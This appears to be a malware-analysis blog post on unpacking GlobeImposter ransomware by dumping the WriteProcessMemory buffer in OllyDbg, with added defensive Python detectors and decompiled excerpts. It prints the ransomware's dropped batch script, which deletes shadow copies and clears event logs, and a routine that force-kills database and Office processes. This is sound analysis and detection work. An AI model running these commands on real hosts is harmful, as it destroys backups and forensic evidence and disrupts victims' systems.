Let’s Learn: How to Unpack GlobeImposter ".726" Ransomware

Goal: Unpack the GlobeImposter ransomware payload by dumping the buffer passed to the WriteProcessMemory API (the same method used for Locky in the previous blog).
Tools: OllyDbg, CFF Explorer, IDA Pro
Malware SHA-256: 5b88544bebacba38708685b905a94742c7798bf64b6f90f46acbc3f6de4399e7
Original GlobeImposter sample:

GlobeImposter ransomware uses a loader/patcher routine that decodes its payload and patches it into memory.

GlobeImposter patches itself as follows: it calls the CreateProcessA API with the creation flag CREATE_SUSPENDED and writes its payload into the new process via the WriteProcessMemory API. The new process does not run immediately; it stays suspended until ResumeThread is called, which gives the ransomware time to patch it in memory.
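The sequence described above (a child started with CREATE_SUSPENDED, memory written into it, then ResumeThread) is also what a defender looks for in an API trace. The following is an added example, not code from the original post: it parses a constructed, simplified API-trace format (one event per line, `<caller pid> <caller image> <api> key=value ...`, an assumption of this example rather than any real sandbox's format) and reports every suspended child that received at least one WriteProcessMemory before being resumed, noting whether the child image is the caller's own executable, as in GlobeImposter's self-patching.

```python
import re

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit that starts the child paused

# Constructed trace format for this example (not a real sandbox's output):
#   <caller_pid> <caller_image> <api> key=value key=value ...
LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<image>\S+)\s+(?P<api>\w+)\s*(?P<args>.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Split one trace line into caller pid, caller image, API name and arguments."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "pid": int(m.group("pid")),
        "image": m.group("image"),
        "api": m.group("api"),
        "args": dict(KV_RE.findall(m.group("args"))),
    }


def detect_suspended_patch(lines):
    """Track, per child pid, CreateProcess(CREATE_SUSPENDED) -> WriteProcessMemory -> ResumeThread.

    A finding is emitted only when the child is resumed after at least one write,
    so a plain suspended start (e.g. a debugger attaching) is not reported on its own.
    """
    children = {}   # child pid -> state of the suspected chain
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        a = ev["args"]
        if ev["api"] in ("CreateProcessA", "CreateProcessW"):
            flags = int(a.get("flags", "0"), 16)
            if flags & CREATE_SUSPENDED:
                child_image = a.get("child_image", "")
                children[int(a["child_pid"])] = {
                    "parent": ev["pid"],
                    "image": child_image,
                    "self_patch": child_image == ev["image"],  # child is the caller's own binary
                    "writes": 0,
                    "bytes": 0,
                    "resumed": False,
                }
        elif ev["api"] == "WriteProcessMemory":
            st = children.get(int(a.get("target_pid", "0")))
            if st is not None and not st["resumed"]:
                st["writes"] += 1
                st["bytes"] += int(a.get("size", "0"), 16)
        elif ev["api"] == "ResumeThread":
            target = int(a.get("target_pid", "0"))
            st = children.get(target)
            if st is not None and st["writes"] > 0 and not st["resumed"]:
                st["resumed"] = True
                findings.append({
                    "parent_pid": st["parent"],
                    "child_pid": target,
                    "image": st["image"],
                    "writes": st["writes"],
                    "bytes_written": st["bytes"],
                    "self_patch": st["self_patch"],
                })
    return findings


# Constructed sample trace: a self-patching chain plus a benign CreateProcess for contrast.
SAMPLE_TRACE = r"""
1234 C:\Users\victim\AppData\Local\Temp\sample.exe CreateProcessA child_pid=1300 child_image=C:\Users\victim\AppData\Local\Temp\sample.exe flags=0x4
1234 C:\Users\victim\AppData\Local\Temp\sample.exe WriteProcessMemory target_pid=1300 base=0x400000 size=0x1c000
1234 C:\Users\victim\AppData\Local\Temp\sample.exe ResumeThread target_pid=1300
5678 C:\Windows\explorer.exe CreateProcessW child_pid=5700 child_image=C:\Windows\notepad.exe flags=0x0
5678 C:\Windows\explorer.exe ResumeThread target_pid=5700
"""

if __name__ == "__main__":
    for f in detect_suspended_patch(SAMPLE_TRACE.splitlines()):
        print(f)
```

Only the sample.exe chain is reported; explorer.exe starting notepad.exe without CREATE_SUSPENDED and without any cross-process write never enters the tracked state.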

I. Load OllyDbg and click “File” ->
II. Click “Go to” -> “Expression” -> type “WriteProcessMemory” and set a breakpoint on it with F2.
III. Run the process with F9; when the breakpoint hits, follow the buffer argument in the dump window to observe the unpacked GlobeImposter payload.
IV. Then, click “Backup” -> “Save data to file.”
V. Verify the exported payload and its IAT in CFF Explorer. Profit!
VI. Enjoy analyzing the decoded payload in IDA Pro!
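Step V is the sanity check on what was saved from the dump window: the file must start with a valid MZ/PE header pair and its import directory must point somewhere inside the image before IDA will give a useful IAT. The following is an added example, not code from the original post and not CFF Explorer's logic: it parses the DOS header, PE signature, COFF and optional headers and section table of a dumped buffer, then walks the import descriptors to list the DLL names. Because a region saved from a debugger's dump window keeps its in-memory layout, RVAs are used directly by default (`memory_layout=True`); pass `False` for a file-layout PE so RVAs are translated through the section table. The sample image built by `build_sample_dump` is constructed here for the test and is not GlobeImposter's payload.

```python
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D           # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550        # "PE\0\0"
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B  # PE32 (PE32+ is 0x20B)
IMAGE_DIRECTORY_ENTRY_IMPORT = 1       # index of the import directory entry


def parse_headers(data):
    """Validate DOS/PE signatures and return the header fields needed to check a dump."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    # Data directory array starts at +96 in a PE32 optional header, +112 in PE32+
    dd = opt + (96 if magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC else 112)
    imp_rva, imp_size = struct.unpack_from("<II", data, dd + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT)
    sec_table = opt + opt_size
    if sec_table + 40 * nsections > len(data):
        raise ValueError("section table truncated")
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, sec_table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw": rawptr, "rawsize": rawsize})
    return {"machine": machine, "sections": sections,
            "import_rva": imp_rva, "import_size": imp_size}


def is_valid_pe(data):
    try:
        parse_headers(data)
        return True
    except ValueError:
        return False


def rva_to_offset(rva, sections, memory_layout):
    """Map an RVA to a buffer offset; identity for an in-memory dump."""
    if memory_layout:
        return rva
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["raw"]
    return None


def list_import_dlls(data, memory_layout=True):
    """Walk IMAGE_IMPORT_DESCRIPTOR entries (20 bytes each) and return the DLL names."""
    hdr = parse_headers(data)
    off = rva_to_offset(hdr["import_rva"], hdr["sections"], memory_layout)
    if not hdr["import_rva"] or off is None:
        return []
    dlls = []
    while off + 20 <= len(data):
        _, _, _, name_rva, first_thunk = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0 and first_thunk == 0:   # all-zero terminator descriptor
            break
        noff = rva_to_offset(name_rva, hdr["sections"], memory_layout)
        if noff is None or noff >= len(data):
            break
        end = data.find(b"\0", noff)
        dlls.append(data[noff:end if end != -1 else len(data)].decode("ascii", "replace"))
        off += 20
    return dlls


def build_sample_dump():
    """Constructed minimal PE32 image in memory layout (headers at 0, .rdata at RVA 0x1000)."""
    image = bytearray(0x2000)
    struct.pack_into("<H", image, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", image, 0x3C, 0x80)                      # e_lfanew
    pe = 0x80
    struct.pack_into("<I", image, pe, IMAGE_NT_SIGNATURE)
    struct.pack_into("<HHIIIHH", image, pe + 4, 0x14C, 1, 0, 0, 0, 224, 0x102)  # i386, 1 section
    opt = pe + 24
    struct.pack_into("<H", image, opt, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    struct.pack_into("<II", image, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT, 0x1000, 60)
    struct.pack_into("<8sIIII", image, opt + 224, b".rdata", 0x1000, 0x1000, 0x1000, 0x1000)
    image[0x1100:0x110D] = b"KERNEL32.dll\0"
    image[0x1110:0x111D] = b"ADVAPI32.dll\0"
    struct.pack_into("<IIIII", image, 0x1000, 0x1200, 0, 0, 0x1100, 0x1300)  # descriptor 1
    struct.pack_into("<IIIII", image, 0x1014, 0x1220, 0, 0, 0x1110, 0x1320)  # descriptor 2
    return bytes(image)                                                       # descriptor 3 is zero


if __name__ == "__main__":
    dump = build_sample_dump()
    print(parse_headers(dump)["sections"])
    print(list_import_dlls(dump))
```

On a real dump, an empty DLL list or an import RVA outside every section means the saved region is not a complete image (or the header was patched after the write) and the IAT needs rebuilding before the payload is useful in IDA.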
(a) Registry persistence:

(b) GlobeImposter vssadmin & host script (a temporary .bat that deletes shadow copies, wipes the RDP connection history and clears the event logs):
  GetTempFileNameW(&PathName, L"__tmp", 0, &TempFileName);
  lstrcatW(&TempFileName, L".bat");
  // GENERIC_WRITE, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
  result = CreateFileW(&TempFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
  v1 = result;
  if ( result != (HANDLE)-1 )
  {
    v2 = lstrlenA("@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"\r\ncd %userprofile%\\documents\\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"");
    // the same script text as the decompiler shows it, split per line (the call it is passed to is not shown in this excerpt):
      "@echo off\r\n"
      "vssadmin.exe Delete Shadows /All /Quiet\r\n"
      "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f\r\n"
      "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f\r\n"
      "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"\r\n"
      "cd %userprofile%\\documents\\\r\n"
      "attrib Default.rdp -s -h\r\n"
      "del Default.rdp \r\n"
      "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"",
    result = (HANDLE)sub_4126D7(&TempFileName);
  }
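The dropped script is a compact set of host-side indicators (shadow-copy deletion, RDP history wiping, event-log clearing) that a triage tool can match without any knowledge of the sample. The following is an added example, not code from the original post: it scans batch-script text line by line against three patterns derived from the script above and returns which indicator families fired. The sample script is the page's own .bat contents reproduced as a constructed string; the benign script is constructed for contrast.

```python
import re

# Indicator families drawn from the dropped .bat, matched case-insensitively per line.
INDICATORS = {
    "shadow_copy_deletion": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "event_log_clearing": re.compile(r"\bwevtutil(?:\.exe)?\s+cl\b", re.I),
    "rdp_history_wipe": re.compile(r"Terminal Server Client|Default\.rdp", re.I),
}


def scan_batch_script(text):
    """Return {indicator: [matching lines]} for every indicator that fires at least once."""
    hits = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith("rem "):   # skip blanks and comments
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(line)
    return hits


def classify(text, threshold=2):
    """Flag a script as suspicious when at least `threshold` indicator families fire.

    One family alone (e.g. an admin's scripted log rotation) is reported but not
    flagged; the combination seen in the ransomware script trips the threshold.
    """
    hits = scan_batch_script(text)
    return {"indicators": sorted(hits), "suspicious": len(hits) >= threshold, "hits": hits}


# The .bat body shown in the decompiler output above, as a constructed string.
SAMPLE_SCRIPT = r"""@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
"""

# Constructed benign script: an ordinary backup job that touches none of the indicators.
BENIGN_SCRIPT = "@echo off\r\nrem nightly copy\r\nxcopy C:\\data D:\\backup /E /Y\r\n"

if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, classify(script))
```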
(c) RSA public encryption key function value:
 v18 = RSA_Encrypt_Function(

  v3 = lpString;
  memset(&v8, 0, 0x400u);
  memset(&v10, 0, 0x200u);
  sub_4108D0(&v12, v4);
  v5 = lstrlenA("rsa_encrypt");
  if ( !sub_40FB4F((int)&v11, (int)&v9, "rsa_encrypt", v5)
    && !sub_40F391(&v14, v3)               // key material passed in as a string
    && !sub_40F391(&v15, "010001") )       // 0x10001 = 65537, the usual RSA public exponent
  {
    v13 = (unsigned int)(sub_40F4AA(&v14) + 7) >> 3;   // bit length rounded up to bytes
    memmove(&v8, a2, a3);
    if ( sub_41028B(&v11, v6, a3, &v8, (int)&v10) )
    {
      memset(&v10, 0, a3);
    }
  }
(d) Taskkill function terminating every process whose (lower-cased) image name contains one of the following substrings:
  • "sql"
  • "outlook"
  • "ssms"
  • "postgre"
  • "1c"
  • "excel"
  • "word"
  memset(&StartupInfo, 0, 0x44u);
  StartupInfo.cb = 68;
  result = CreateToolhelp32Snapshot(2u, 0);          // TH32CS_SNAPPROCESS
  v2 = result;
  if ( result != (HANDLE)-1 )
  {
    pe.dwSize = 556;                                 // sizeof(PROCESSENTRY32W)
    Process32FirstW(result, &pe);
    do
    {
      v3 = (LPCSTR *)off_41B950;                     // first entry of the name list above
      while ( 1 )
      {
        v4 = sub_4128DF(pe.szExeFile, 0);            // ANSI copy of the image name
        v5 = lstrlenW(pe.szExeFile);
        for ( i = 0; i < v5; i = v8 + 1 )            // lower-case the copy in place
        {
          v7 = sub_40C31A((char *)v4[i]);
          v4[v8] = v7;
        }
        if ( StrStrA(v4, *v3) )                      // substring match against the list entry
          break;                                     // (break and ++v3 reconstructed; dropped in the excerpt)
        ++v3;
        if ( (signed int)v3 >= (signed int)&unk_41B96C )   // end of the list: no match
          goto LABEL_10;
      }
      v9 = HeapCreate(0, 0x1000u, 0);
      v10 = (CHAR *)HeapAlloc(v9, 0, 0x100u);
      wsprintfA(v10, "%d", pe.th32ProcessID);
      lstrcpyA(&String1, "taskkill /F /T /PID ");
      lstrcatA(&String1, v10);
      CreateProcessA(0, &String1, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);   // CREATE_NO_WINDOW
LABEL_10:                                            // (label position reconstructed)
      ;
    }
    while ( Process32NextW(v2, &pe) );
    result = (HANDLE)CloseHandle(v2);
  }
  return result;
(e) Targeted exclusion extensions and README extortion message in Olly:
